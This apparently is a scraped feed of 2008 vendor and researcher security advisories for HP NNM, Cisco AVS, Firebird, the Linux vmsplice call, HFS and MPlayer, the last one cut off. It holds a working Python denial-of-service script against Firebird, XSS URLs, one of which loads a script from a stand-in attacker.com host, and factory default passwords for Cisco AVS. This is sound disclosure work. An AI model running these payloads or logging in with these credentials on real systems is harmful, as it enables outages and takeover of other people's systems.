]]> Wed, 09 Jan 2008 16:06:53 -0500 iDefense Labs http://lists.jammed.com/vulnwatch/2008/02/0004.html iDefense Security Advisory 02.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 04, 2008

I. BACKGROUND

HP Network Node Manager is a network mapping and management application
that allows administrators to monitor and control their networks. The
ovtopmd process listens, in a default configuration, on TCP port 2532.
More information can be found on the vendor's site at the following
URL.

http://h20229.www2.hp.com/products/nnm/index.html

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in
Hewlett-Packard's Network Node Manager product allows attackers to
crash the ovtopmd process.

The ovtopmd process contains an implementation error, in which it
attempts to access an invalid memory address based on data within the
TCP stream. By sending a specially crafted request, an attacker can
cause the service to crash.

III. ANALYSIS

Exploitation allows an attacker to crash the ovtopmd process. In order
to exploit this vulnerability, an attacker must be able to establish a
session with the service on TCP port 2532. No authentication is
required to access the vulnerable code path.

IV. DETECTION

iDefense has confirmed this vulnerability in HP's OpenView Network Node
Manager 7.5 with all updates applied as of May 14th, 2007.

V. WORKAROUND

Employing firewalls to limit access to the affected service will
mitigate exposure to this vulnerability.

VI. VENDOR RESPONSE

Hewlett-Packard has addressed this vulnerability in the HPSBMA02307
(SSRT071420) security bulletin. For more information, visit the
following URL.

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01321117

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0212 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/14/2007 Initial vendor notification
05/15/2007 Initial vendor response
02/04/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@private for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

]]> Wed, 06 Feb 2008 14:19:06 -0500 iDefense Labs http://lists.jammed.com/vulnwatch/2008/01/0006.html -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Default Passwords in the Application Velocity
System

Advisory ID: cisco-sa-20080123-avs

http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml

Revision 1.0

For Public Release 2008 January 23 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Versions of the Cisco Application Velocity System (AVS) prior to
software version AVS 5.1.0 do not prompt users to modify system account
passwords during the initial configuration process. Because there is no
requirement to change these credentials during the initial configuration
process, an attacker may be able to leverage the accounts that have
default credentials, some of which have root privileges, to take full
administrative control of the AVS system.

After upgrading to software version AVS 5.1.0, users will be prompted to
modify these credentials.

Cisco will make free upgrade software available to address this
vulnerability for affected customers. The software upgrade will
be applicable only for the AVS 3120, 3180, and 3180A systems. The
workaround identified in this document describes how to change the
passwords in current releases of software for the AVS 3110.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0029 has
been assigned to this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml.

Affected Products
=================

Vulnerable Products
+------------------

This vulnerability affects the Cisco AVS 3110, 3120, 3180, and 3180A
Management Station appliances that are running software versions prior
to AVS 5.1.0. Administrators can determine the software version of the
AVS appliances by logging in to the Management Station web-based user
interface or from the command-line interface (CLI) of the appliance
operating system.

Customers who use the AVS 3180 or 3180A Management Station can determine
their node software versions by navigating to the Cluster Information
Page. Each registered node will display the corresponding software
version when the node is selected.

The AVS appliance version can also be determined from the host operating
system by using the "Show Version" command.

The following example shows "Show Version" output for an AVS 3120
appliance that is running version 5.1.0:

velocity>Show Version

****************************************
Cisco Application Velocity System,(AVS)
----------------------------------------
AVS 3120-K9 005.001(000.034)
****************************************

The following example shows "Show Version" output for an AVS 3180 or
3180A appliance that is running version 5.1.0:

velocity>Show Version

****************************************
Cisco Application Velocity System,(AVS)
----------------------------------------
AVS 3180-MGMT 005.001(000.034)
****************************************

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

The Cisco AVS 3110 and 3120 are enterprise data center appliances for
improving web application performance, measuring end-user response
time, and managing application security. The Cisco AVS 3120 enforces
application security with an integrated web application firewall. The
Cisco AVS 3180 and 3180A Management Stations provide web-based tools for
the configuration and application performance monitoring for a cluster
of AVS 3110s and 3120s or individual nodes.

The Cisco AVS 3110, 3120, 3180, and 3180A Management Stations use some
system accounts that are initially configured with default passwords.
Vulnerable versions of the AVS software do not prompt the administrator
to change the passwords for these accounts, including accounts with root
privileges, during the initial configuration process. Non-vulnerable
versions of AVS software will now prompt administrators to change these
accounts after installation.

Note: If the passwords for the AVS 3110 or 3120 are changed on the
device itself and it has previously been registered with an AVS 3180
or 3180A Management Station, the node must be re-registered with the
Management Station console. Otherwise, communication between the AVS
3180 or 3180A Management Station and AVS 3110 or 3120 node will be lost.

For additional details about the AVS node registration process, refer to
the "Register Node" section of the Cisco AVS User's Guide.

After upgrading the appliance software to version AVS 5.1.0 and logging
in for the first time, the administrator will now be prompted to change
the system account passwords.

The following example shows the new password change prompts and the
subsequent password change dialog for the AVS 3120 after upgrade:

velocity login: fgn
Password:
**WARNING** System wide secrets are in factory default state.
Would you like to change these now? [y/n] y changing root password
enter password:
enter password again:
changing fgn password
enter password:
enter password again:
changing DB password
enter password:
enter password again:

Please wait...The DB password change will take a few minutes.
changing node manager password
enter password:
enter password again:
changing condenser password
enter password:
enter password again:
changing console password
enter password:
enter password again:

The following example shows the new password change prompts and the
subsequent password change dialog for the AVS 3180 and 3180A after
upgrade:

velocity login: fgn
Password:
**WARNING** System wide secrets are in factory default state.
Would you like to change these now? [y/n] y changing root password
enter password:
enter password again:
changing fgn password
enter password:
enter password again:
changing DB password
enter password:
enter password again:

Please wait...The DB password change will take a few minutes.
changing console password
enter password:
enter password again:

This issue is documented in Cisco Bug ID CSCsd94732.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

* AVS Default Account Passwords Don't Require Change (CSCsd94732)

CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete

CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in full
administrative control of the Cisco AVS system or user-level access to
the host operating system.

Software Versions and Fixes
===========================

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

AVS software version 5.1.0 contains the fix for the vulnerability
described in this document.

AVS software is available for download from the following locations on
cisco.com:

* AVS 3120 5.1.0 (http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3120-5.1)
* AVS 3180 5.1.0 (http://www.cisco.com/pcgi-bin/tablebuild.pl/AVS3180-5.1)

Workarounds
===========

The following workarounds are applicable only for the AVS 3110 and are
performed on the system shell. The AVS 3110 does not have a CLI. The use
of strong passwords is encouraged.

Changing the Root Password
+-------------------------

Complete these steps:

1. Change the root password by using the following command:

shell# passwd


2. Reboot to activate the new settings by using the following command:

shell# reboot

Changing the Management Console Username and Password
+----------------------------------------------------

Complete these steps:

1. Open the following file in a text editor:

$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/users.properties

Use the line admin=admin to set the username and password. The
username appears before the equal sign (=) and the password appears
after the equal sign (=). For example, to change the username to
Cisco and the password to accelerate, change the admin=admin line
to Cisco=accelerate.

2. If you change the username, you must also change this file:

$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/roles.properties

The username is set by the line that contains admin=. The username
appears before the equal sign (=). For example, to change the user
name to Cisco, change the admin= line to Cisco=. Do not change the
text after the equal sign (=) in this file; this field specifies
the account privileges. The username that you enter here must match
the one in the users.properties file in the preceding step.

Changing the Database Username and Password
+------------------------------------------

There are two steps required to change the database password:

1. First change the database password.
2. Then update the Management Console configuration file with the new
database password.

Complete these steps:

1. Log in to the database using the old password, and then use the
alter SQL command to change to the new password.

/usr/local/fineground/console/postgres/bin/psql
-U fineground -p 5432 fgnlog Password : <old password>
Welcome to psql 7.3.4, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit
fgnlog=# alter user fineground password '<new password>'; \q

2. The username and password to access the Management Console database
are set during the Management Console installation process. If you
want to change these later, you can modify an XML configuration
file that the Management Console server reads at start-up.

a. Open the following file in a text editor:

$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/
deploy/postgres-service.xml

Look for the following section in this file:

<!--set these only if you want only default logins,
not through JAAS -->
<config-property name="UserName" type="java.lang.String">fineground</config-property>
<config-property name="Password" type="java.lang.String">condenser</config-property>

b. To change the username, change the value for the UserName
configuration property (fineground in this example).

c. To change the password, change the value for the Password
configuration property (condenser in this example).

d. Save and close the file.

Changing the Node Manager Password
+---------------------------------

Complete these steps:

1. Log in as fgn, and then use the su command to switch to the
superuser.

2. Stop the Condenser and Node Manager:

/etc/init.d/fgnpn<Tab> stop

Press Tab to have the interface complete the command.

3. Go to the $AVS_HOME/perfnode/node_manager/conf directory.

4. Back up the file named passwords.

5. Change the password with the following command:

$AVS_HOME/perfnode/bin/htpasswd -bcm passwords.new admin <password>

In the preceding command, passwords.new is the name of the file in
which the passwords are stored. Currently only the user admin is
supported.

6. Install the file with the following command:

install -m 400 -o nobody -g nobody passwords.new passwords

7. Restart the appliance with the reboot command.

8. Re-register the node from the Management Console for which the node
manager password was changed.

Changing the Condenser Password
+------------------------------

Complete these steps:

1. Log in as fgn, and then use the su command to switch to the
superuser.

2. Stop the Condenser and Node Manager:

/etc/init.d/fgnpn<TAB> stop

Press Tab to have the interface complete the command.

3. Go to the $AVS_HOME/perfnode/passwd directory.

4. Backup the file named .htpasswd.

5. Change the password with the following command:

$AVS_HOME/perfnode/bin/htpasswd -bcm passwords.new fineground <password>

In the preceding command, passwords.new is the name of the file in
which the passwords are stored. Currently only the user fineground
is supported.

6. Install the file with the following command:

install -m 400 -o nobody -g nobody passwords.new .htpasswd

7. Restart the appliance with the reboot command.

8. Re-register the node from the Management Console for which the
Condenser password was changed.

Obtaining Fixed Software
========================

Cisco has released software updates that address this vulnerability.
Prior to deploying software, customers should consult their maintenance
provider or check the software for feature set compatibility and known
issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@private or security-alert@private for software
upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@private

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was identified through internal testing.

Status of this Notice: Final
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at :

http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.

* cust-security-announce@private
* first-teams@private
* bugtraq@private
* vulnwatch@private
* cisco@private
* cisco-nsp@private
* full-disclosure@private
* comp.dcom.sys.cisco@private

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------+
| Revision 1.0 | 2008-January-23 | Initial public release |
+-------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+----------------------------------------------------------------------
All contents are Copyright (C) 2006-2008 Cisco Systems, Inc. All rights
reserved.
+----------------------------------------------------------------------

Updated: Jan 21, 2008 Document ID: 100212

+----------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHl3j486n/Gc8U/uARArPpAJwJaihdYFR6B+ljPNEYLq6nCfluxgCbB85h
UYvka5159PAAagGuJDiS10E=
=PnnY
-----END PGP SIGNATURE-----

]]> Wed, 23 Jan 2008 12:28:29 -0500 Cisco Systems Product Security Incident Response Team http://lists.jammed.com/vulnwatch/2008/01/0010.html -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs


Firebird Remote Memory Corruption

*Advisory Information*

Title: Firebird Remote Memory Corruption
Advisory ID: CORE-2007-1219
Advisory URL: http://www.coresecurity.com/?action=item&id=2095
Date published: 2008-01-28
Date of last update: 2008-01-24
Vendors contacted: Firebird SQL
Release mode: Coordinated Release

*Vulnerability Information*

Class: Memory corruption
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: 27403
CVE Name: CVE-2008-0387

*Vulnerability Description*

Firebird [1][2] is a relational database that runs on Linux, Windows,
and a variety of Unix platforms. The Firebird Project is a commercially
independent project of C and C++ programmers, technical advisors and
supporters developing and enhancing a multi-platform relational database
management system based on the source code released by Inprise Corp (now
known as Borland Software Corp) on 25 July, 2000.

The Firebird database manager contains an Integer Overflow in the
processing of certain tags on the XDR protocol used for communication
with the server. This led the server to corrupt the process memory and
crash. Repeated attempts are followed by a crash of the process in
charge of restarting the database server. This may also grant attackers
remote execution of arbitrary code on servers running Firebird.

*Vulnerable packages*

. Firebird SQL 1.0.3 and before.
. Firebird SQL 1.5.5 and before.
. Firebird SQL 2.0.3 and before.
. Firebird SQL 2.1.0 Beta 2 and before.

*Non-vulnerable packages*

. Firebird SQL 1.5.6 (to be released)
. Firebird SQL 2.0.4 (to be released)
. Firebird SQL 2.1.0 RC1

*Vendor Information, Solutions and Workarounds*

Firebird v2.1.0 RC1 fixes this vulnerability and is available for
download at http://firebirdsql.org/index.php?op=files&id=fb210_RC1

The fix will also be included in versions v1.5.6 and v2.0.4. Version
2.0.4 will be released in February. The version 1.5.6 release is
expected later this year.

The issue is registered [3] in Firebird Tracker as CORE-1681.

*Credits*

This vulnerability was discovered and researched by Damian Frizza with
assistance of Alfredo Ortega from Core Security Technologies.

*Technical Description / Proof of Concept Code*

The memory corruption happens when the parser (src/remote/protocol.cpp)
receives any of the following operations with invalid data:

op_receive
op_start
op_start_and_receive
op_send
op_start_and_send
op_start_send_and_receive

The parser fails to properly sanitize certain variables before use. We
can see that in the file src/remote/protocol.cpp there are the following
assignments directly from the packet buffer to the data structure,
without any validation (The MAP macro doesn't have any range checking):

src/remote/protocol.cpp:417

MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
/* Changes to this op's protocol must mirror in xdr_protocol_overhead */
return xdr_request(xdrs, data->p_data_request,
data->p_data_message_number,
data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);

And in the function xdr_request(), the variable data->p_data_request (as
request_id) is used to index an array:

...
rrq* request = (rrq*) port->port_objects[request_id];
...

Corrupting memory structures and causing a DoS of the server, with
possible execution of code. The same happens with the variable
data->p_data_message_number.

The following python PoC causes a remote Denial of service and
demonstrates the bug:

##Firebird DoS
##Damian Frizza - Core Security Exploit Writers Team
##tested against Firebird-2.0.3.12981-1-Win32.exe and
##Firebird-2.1.0.16780_0_Win32.exe

##fbserver.exe 2.0.3
##005637D0 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
##005637D4 0FB700 MOVZX EAX,WORD PTR DS:[EAX]
##005637D7 83EC 50 SUB ESP,50
##005637DA 56 PUSH ESI
##005637DB 8BF1 MOV ESI,ECX
##005637DD 8B8E AC000000 MOV ECX,DWORD PTR DS:[ESI+AC]
##005637E3 3B41 08 CMP EAX,DWORD PTR DS:[ECX+8] <----
##CRASH HERE


import socket
import time

def getTargetIP():
return '192.168.xxx.xxx'


port= 3050
op = '\x4a'


packet = '\x00\x00\x00' + op + 'A' * 2000


##Making the connection and sending the data 5 times, fbguard.exe fails
##to restart the service.

for i in range(0, 5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((getTargetIP(), port))
s.send(str(packet))
s.close()
time.sleep(1)

*Report Timeline*

2008-01-04: Initial notification sent by CoreLabs to Firebird SQL
development team.
2008-01-08: Notification acknowledged by Firebird SQL development team.
2008-01-08: Technical details sent by Core to Firebird SQL dev. team.
2008-01-10: Firebird SQL dev. team notifies Core that a fix has been
produced, and will be released in Firebird versions v1.5.6, v2.0.4 and
v2.1.0 RC1.
2008-01-10: CoreLabs acknowledges information about fixes and requests
date of the v2.1.0 RC1 release to the Firebird dev. team.
2008-01-15: Firebird dev. team confirms vendor information and dates of
fixed versions.


*References*

[1] http://sourceforge.net/projects/firebird/
[2] http://www.firebirdsql.org/
[3] http://tracker.firebirdsql.org/browse/CORE-1681

*About Corelabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core augments its
leading technology solution with world-class security consulting
services, including penetration testing and software security auditing.
Based in Boston, MA and Buenos Aires, Argentina, Core Security
Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com .

*DISCLAIMER*

The contents of this advisory are copyright (c) 2008 CORE Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*PGP/GPG KEYS*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHnhGQyNibggitWa0RAjcmAJ94rGoTbUBQALmV5yOudJfL4B038QCgpzNw
dFwDpUnOO6OHI0L45rIwyFU=
=dlYg
-----END PGP SIGNATURE-----

]]> Mon, 28 Jan 2008 15:32:00 -0200 Core Security Technologies Advisories http://lists.jammed.com/vulnwatch/2008/02/0005.html ===[ ABSTRACT ]=========================================================

A new vmsplice() system call was introduced in the 2.6.17 release of the
Linux kernel. In the 2.6.23 kernel the system call functionality has
been further extended resulting in two new critical vulnerabilities.


===[ AFFECTED SOFTWARE ]================================================

Linux 2.6.23 - 2.6.24

For the exact kernel version please refer to an information provided by
your vendor.


===[ DESCRIPTION ]======================================================

VULNERABILITY #1

Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):

---8<--- fs/splice.c:1378 ---8<---
error = get_user(base, &iov->iov_base);
/* ... */
if (unlikely(!base)) {
error = -EFAULT;
break;
}
/* ... */
sd.u.userptr = base;
/* ... */
size = __splice_from_pipe(pipe, &sd, pipe_to_user);
---8<--- fs/splice.c:1401 ---8<---

The code lacks validation of these pointers (i.e. with access_ok()).
The __splice_from_pipe() assumes these are valid user-memory pointers
and never makes any verification of them. The function dereferences the
pointers with __copy_to_user_inatomic() function (in pipe_to_user()) in
order to write data to user-process memory in this case leading to
possibility of arbitrary data (read from pipe) to arbitrary kernel
memory.


VULNERABILITY #2

The copy_from_user_mmap_sem() function copies data from user-process
memory with the use of __copy_from_user_inatomic() without validating
user-supplied pointer with access_ok():

---8<--- fs/splice.c:1188 ---8<---
partial = __copy_from_user_inatomic(dst, src, n);
---8<--- fs/splice.c:1188 ---8<---

This vulnerability leads to indirect reading of arbitrary kernel memory.


===[ IMPACT ]===========================================================

Vulnerabilities may lead to local system compromise including execution
of arbitrary machine code in the context of running kernel.

Vulnerability #1 has been successfully exploited on Linux 2.6.24.
Vulnerability #2 not tested.


===[ DISCLOSURE TIMELINE ]==============================================

1st Feb 2008 Vendor notification
8th Feb 2008 Public disclosure


===[ AUTHOR ]===========================================================

Wojciech Purczynski <cliph@private>

Wojciech Purczynski is a Security Researcher at Vulnerability Research
Labs, COSEINC PTE Ltd.
http://coseinc.com

Wojciech Purczynski is also a member of iSEC Security Research
http://isec.pl/


===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2008 Wojciech Purczynski
Copyright (c) 2008 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE
CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE
LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES,
LOSSES OR UNLAWFUL OFFENCES.

USE AT YOUR OWN RISK.

]]> Tue, 12 Feb 2008 08:50:49 +0100 Wojciech Purczynski http://lists.jammed.com/vulnwatch/2008/01/0007.html Syhunt: HFS (HTTP File Server) Template Cross-Site Scripting and
Information Disclosure Vulnerabilities

Advisory-ID: 200801161
Discovery Date: 1.16.2008
Release Date: 1.23.2008
Affected Applications: HFS 2.0 to and including 2.3(Beta Build
#174)
Non-Affected Applications: HFS 1.6a and earlier versions
Class: Cross-Site Scripting (XSS), Information Disclosure
Status: Patch available/Vendor informed
Vendor: Massimo Melina
Vendor URL: http://www.rejetto.com/hfs -or- hfs.sourceforge.net

The Common Vulnerabilities and Exposures (CVE) project has
assigned the following CVEs to these vulnerabilities:
* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
* CVE-2008-0410 - Information Disclosure Vulnerability

----------------------------------------------------------------

Overview:
HFS is a very popular open source HTTP server designed for
easily sharing files. According to information on the official
website, the HTTP File Server software has been downloaded about
2 million times.

Description:
When a specific URL is visited, HFS displays a non-existent
account name in the response body. This non-existent account
name can be HTML code, allowing a remote attacker to use this
to launch XSS attacks.

Because the HTML code is also recognized by the web server as a
HFS HTML template, it is also possible to inject symbols to
force HFS to reveal details about the server (eg, current HFS
server version, build, connections, timestamp, uptime, current
outbound and inbound speed, and more). Technical details are
included below.

----------------------------------------------------------------

Details (Replicating the issues):

1) Cross-Site Scripting (XSS) and Host Field XSS Vulnerabilities
Example 1 - Launching a basic XSS:
http://>alert('Syhunt%20XSS')<%2fscript>a:x@[host]/

Example 2 - Injecting an external script (A mix of encoding and
javascript functions is used here to circumvent browser
URL limitations):
http://>var%20sChar=String%2efromCharCode(58)%3bdocument
%2ewrite('<script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom
%2fxss%2ejs><%5c%2fscript>')%3b<%2fscript>a:x@[host]/

* This is specially dangerous if launched against Firefox. In
order to protect the password from prying eyes, Firefox entirely
hides what comes before the at (@) character and then only the
host name remains visible in the address bar. Firefox will also
resubmit the auth credentials everytime the host is visited
during the current browser session (unless new credentials are
supplied).

* User must be already logged in (via /~login) and the current
(root) path should not be password protected in the HFS-VFS
panel.

* If the host symbol is injected using this technique, HFS will
recognize it as a HTML template and return the data provided in
Host field of the request as part of the response body. The same
happens if the host symbol has been included (after
customization) in the current HFS HTML template.

Detection:
http://www.syhunt.com/advisories/hfshack.txt
See the "checkxss" command

Sandcat can also be used to identify this issue:
http://www.syhunt.com/sandcat

2) Information Disclosure

Example 1 - Injecting Symbols:
http://www.syhunt.com/advisories/hfshack.txt
The "ver" command will force HFS to reveal its version and build
The "symbols" command will force HFS to reveal additional
details about the server (such as connections, timestamp, uptime,
current outbound and inbound speed, and more).

* You can disable the "Send HFS identifier" option (which
enables the HFS banner) and remove all server identifier
symbols from the original HTML template, and still it will work.

Additional Considerations:
* An updated IE will not accept basic auth via URL. See:
http://support.microsoft.com/kb/834489 and the MS security
update 832894 if you wish to learn about this subject.

----------------------------------------------------------------

Vulnerability Status:
The vendor was contacted and has immediately released HFS 2.2c
which fixes these problems. The new version can be downloaded at
www.rejetto.com/hfs/download or via the "Check for news/updates"
option in the HFS menu.

As a workaround for the affected releases, users should remove
the %user% and %host% symbols from any HFS HTML templates.

Testers of HFS 2.3 Beta should upgrade to the latest 2.3 beta
build.

HFS 2.3 Beta specifically is only affected if the option
"Accept any login for unprotected resources" is enabled. This
option, introduced in this version, is disabled by default.

----------------------------------------------------------------

Credit:
Felipe Aragon and Alec Storm
Syhunt Security Research Team, www.syhunt.com

---

Copyright © 2008 Syhunt Security

Disclaimer:
The information in this advisory is provided "as is" without
warranty of any kind. Details provided are strictly for
educational and defensive purposes.

Syhunt is not liable for any damages caused by direct or
indirect use of the information provided by this advisory.

]]> Wed, 23 Jan 2008 15:48:38 -0200 Alec Storm http://lists.jammed.com/vulnwatch/2008/02/0000.html -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

MPlayer arbitrary pointer dereference

*Advisory Information*

Title: MPlayer arbitrary pointer dereference
Advisory ID: CORE-2008-0122
Advisory URL: http://www.coresecurity.com/?action=item&id=2102
Date published: 2008-02-04
Date of last update: 2008-01-30
Vendors contacted: MPlayer team
Release mode: Coordinated release


*Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 27499
CVE Name: CVE-2008-0485


*Vulnerability Description*

The MPlayer package [1] is vulnerable to an arbitrary pointer
dereference vulnerability, which can be exploited by malicious remote
attackers to compromise a user's system. The vulnerability is caused by
the MPlayer libmpdemux ('demux_mov.c') library not properly sanitizing
certain tags on a MOV file before using them to index an array on the
heap. This can be exploited to execute arbitrary commands by opening a
specially crafted file.


